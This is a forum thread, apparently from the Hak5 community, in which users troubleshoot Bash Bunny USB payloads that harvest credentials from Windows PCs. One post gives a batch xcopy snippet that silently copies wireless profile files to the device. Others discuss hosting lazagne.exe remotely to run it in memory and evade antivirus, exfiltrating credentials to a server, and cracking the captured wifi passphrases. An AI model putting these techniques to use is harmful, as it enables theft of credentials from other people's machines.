Jump to content

Much credentials payloads are not working


Recommended Posts

Hi,

I received my BB a week ago and 'till now none of the credential payloads i've tested did not work. Here's a list i've tried:

  • BrowserCreds
  • MrRobot
  • BunnyTap
  • QuickCreds
  • JackRabbit
  • WindowsCookies

I've tried those on two different PC's, one with Windows 10 and one with Windows 7.

What also kinda bothered me is that i can't get the internet sharing working on Kali Linux. What i've tried:

  1. Create a payload.txt file with "ATTACKMODE ECM_ETHERNET" on it. Started my BashBunny on the switch the file was located ( Switch 1 ).
  2. Download bb.sh from bashbunny.com
  3. Started it with root privileges.
  4. Tried both Guided and Manual but both ended up in having no network at all.

But, beside those things. I really love the BashBunny and its features. Also the shipping was really quick. If anyone got some tips to get those payloads working, please post them.

Link to post
Share on other sites

Made a typo:

"I received my BB a week ago and 'till now none of the credential payloads i've tested did not work. Here's a list i've tried:"

Must be:

"I received my BB a week ago and 'till now all of the credential payloads i've tested did not work. Here's a list i've tried:"

Link to post
Share on other sites

Uhmm, so are you saying it's fixed? :P

The first one was correct, I believe..The way it's worded is a bit confusing.

First thing to do - update firmware to 1.3. Then try the latest QuickCreds. I wouldn't be surprised if all those payloads didn't work as most of them are outdated, especially if you are using firmware 1.0.

Also, my payload Slydoor does a similar thing to those. Maybe copy the bat/ps1 file to the Slydoor directory and tell it to run that instead (MODE option - though the file has to have a .ps1 extension to be run by Slydoor).

OR, even better, make your own passer :D

Edited by Dave-ee Jones
Link to post
Share on other sites
1 hour ago, Dave-ee Jones said:

Uhmm, so are you saying it's fixed? :P

The first one was correct, I believe..The way it's worded is a bit confusing.

First thing to do - update firmware to 1.3. Then try the latest QuickCreds. I wouldn't be surprised if all those payloads didn't work as most of them are outdated, especially if you are using firmware 1.0.

Also, my payload Slydoor does a similar thing to those. Maybe copy the bat/ps1 file to the Slydoor directory and tell it to run that instead (MODE option - though the file has to have a .ps1 extension to be run by Slydoor).

OR, even better, make your own passer :D

Sorry, it is kinda late lol.

No, they're still not working and i'm running the latest version, which is 1.3. I will check out your payload and eventually try to make something myself.

Most payloads ended up with a empty folder/txt file.

Link to post
Share on other sites
44 minutes ago, XenoByte said:

Sorry, it is kinda late lol.

No, they're still not working and i'm running the latest version, which is 1.3. I will check out your payload and eventually try to make something myself.

Most payloads ended up with a empty folder/txt file.

Ah so they did run just didn't execute the DUCKY script? Sounds like a broken driver..

Link to post
Share on other sites
17 minutes ago, Dave-ee Jones said:

Ah so they did run just didn't execute the DUCKY script? Sounds like a broken driver..

Sorry for not being clear enough.

The DUCKY scripts run, so does the Ethernet drivers ( for other payloads ). Mostly they'll fail at the POWERSHELL part. I have no clue where i can find/get a log so i can't provide one.

Link to post
Share on other sites

Ah. Sounds like the language your using is the issue. What's your PCs language? You need to have the Bunny's language the same as the PC's, otherwise when it injects keystrokes it won't interpret them correctly. Below shows how to change them.

Refer:

https://wiki.bashbunny.com/#!./index.md#Languages

Link to post
Share on other sites
9 hours ago, thefragile99 said:

I've noticed this too with the credential extracting payloads. QuickCreds works fine but the rest not so much. I'll check out the languages section of the FAQ. 

Yeah, could be that QuickCreds sets the language before it runs the payloads, whereas the others don't so it doesn't interpret it properly.

Link to post
Share on other sites
  • 2 weeks later...
On 17/7/2017 at 4:36 AM, XenoByte said:

Hi,

I received my BB a week ago and 'till now none of the credential payloads i've tested did not work. Here's a list i've tried:

  • BrowserCreds
  • MrRobot
  • BunnyTap
  • QuickCreds
  • JackRabbit
  • WindowsCookies

I've tried those on two different PC's, one with Windows 10 and one with Windows 7.

What also kinda bothered me is that i can't get the internet sharing working on Kali Linux. What i've tried:

  1. Create a payload.txt file with "ATTACKMODE ECM_ETHERNET" on it. Started my BashBunny on the switch the file was located ( Switch 1 ).
  2. Download bb.sh from bashbunny.com
  3. Started it with root privileges.
  4. Tried both Guided and Manual but both ended up in having no network at all.

But, beside those things. I really love the BashBunny and its features. Also the shipping was really quick. If anyone got some tips to get those payloads working, please post them.

Hi,

I have the same problem than you.

Could you make it work?

Please, if so, I would like to know how. I am getting mad about my BB.

Thanks

Link to post
Share on other sites
  • 1 month later...

 

On 7/17/2017 at 8:06 AM, XenoByte said:

Hi,

I received my BB a week ago and 'till now none of the credential payloads i've tested did not work. Here's a list i've tried:

  • BrowserCreds
  • MrRobot
  • BunnyTap
  • QuickCreds
  • JackRabbit
  • WindowsCookies

I've tried those on two different PC's, one with Windows 10 and one with Windows 7.

What also kinda bothered me is that i can't get the internet sharing working on Kali Linux. What i've tried:

  1. Create a payload.txt file with "ATTACKMODE ECM_ETHERNET" on it. Started my BashBunny on the switch the file was located ( Switch 1 ).
  2. Download bb.sh from bashbunny.com
  3. Started it with root privileges.
  4. Tried both Guided and Manual but both ended up in having no network at all.

But, beside those things. I really love the BashBunny and its features. Also the shipping was really quick. If anyone got some tips to get those payloads working, please post them.

SAME PROBLEM KINDLY HELP!

Link to post
Share on other sites
  • 1 month later...

I am having similar issues. It has been very frustrating. I identified what is broken in the jackrabbit payload; but don't understand why it is failing. All the details are here:

I hope this helps someone; and if I figure this out, I will post my solution in that jackrabbit payload post.

Link to post
Share on other sites
On 7/19/2017 at 4:30 PM, RazerBlade said:

Try the password grabber payload, I created it because I myself hade these problems and for me its very stable.

Does Password Grabber get windows passwords and wireless profile passwords? I ran it; and it is running; but i'm not getting any passwords in the output file it creates. Thanks for your reply.

Link to post
Share on other sites

I modified the xcopy section as follows to grab information on the wireless networks on the client:

REM if Exist %USERPROFILE%\Documents (
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

 

I have confirmed this works and much thanks to RazerBlade for a BB cred payload that actually works! Not only that; but it is insanely fast too! I think we could host the lazagne.exe file on a website we control to get around the read only issue they were discussing on hak5. However, I like the option of being able to do it all locally if possible. What would it take to modify this so we can pull it down from a server and run it? RazerBlade, is that something you could change real fast and make available so we can have an all local copy like we have now and a hosted version like JackRabbit? Thanks again!

Also, now that I have these wireless profiles, what is the best use of them? The passphrases are hashed or something. Can these be cracked or used in another way?

Link to post
Share on other sites
7 hours ago, TeCHemically said:

I modified the xcopy section as follows to grab information on the wireless networks on the client:

REM if Exist %USERPROFILE%\Documents (
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

 

I have confirmed this works and much thanks to RazerBlade for a BB cred payload that actually works! Not only that; but it is insanely fast too! I think we could host the lazagne.exe file on a website we control to get around the read only issue they were discussing on hak5. However, I like the option of being able to do it all locally if possible. What would it take to modify this so we can pull it down from a server and run it? RazerBlade, is that something you could change real fast and make available so we can have an all local copy like we have now and a hosted version like JackRabbit? Thanks again!

Also, now that I have these wireless profiles, what is the best use of them? The passphrases are hashed or something. Can these be cracked or used in another way?

I was thinking of doing the exfiltration via network, but in my experience, it is not as reliable. The best solution for this payload I think is to use read only storage and then have another partition on the Bunny writable so the documents can easily be exfiltrated.

Link to post
Share on other sites
6 hours ago, RazerBlade said:

I was thinking of doing the exfiltration via network, but in my experience, it is not as reliable. The best solution for this payload I think is to use read only storage and then have another partition on the Bunny writable so the documents can easily be exfiltrated.

I agree that is best; but would still like the option. Is there a write up on implementing a read only partition to the bb for this yet? I am working on adding plaintext wifi cred dumping to your payload. I am having powershell syntax issues; but should have it working once that is worked out. I'll share once it is done.

Link to post
Share on other sites
57 minutes ago, RazerBlade said:

Read only storage is now an attackmode. If you use it, you probley need to exfiltrate the data via network by using some fancy powershell script

Oh, I see. Well, doesn't that just reintroduce the same stability issues with hosting payloads? You are still dependent on a network connection for your payload to function. I would rather keep the data written locally and have the option to call on a payload than to have to exfil the data. There's always a chance the exe wont be caught by AV; but if it is hosted and pulled down into memory and executed, then it almost definitely wont get caught by AV. Data exfil brings in its own potential hang ups. I already have a credential payload I'm using for Win that sends creds over the network to a server; but the php script doesn't work right so I just capture them via tcpdump.

Edited by TeCHemically
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...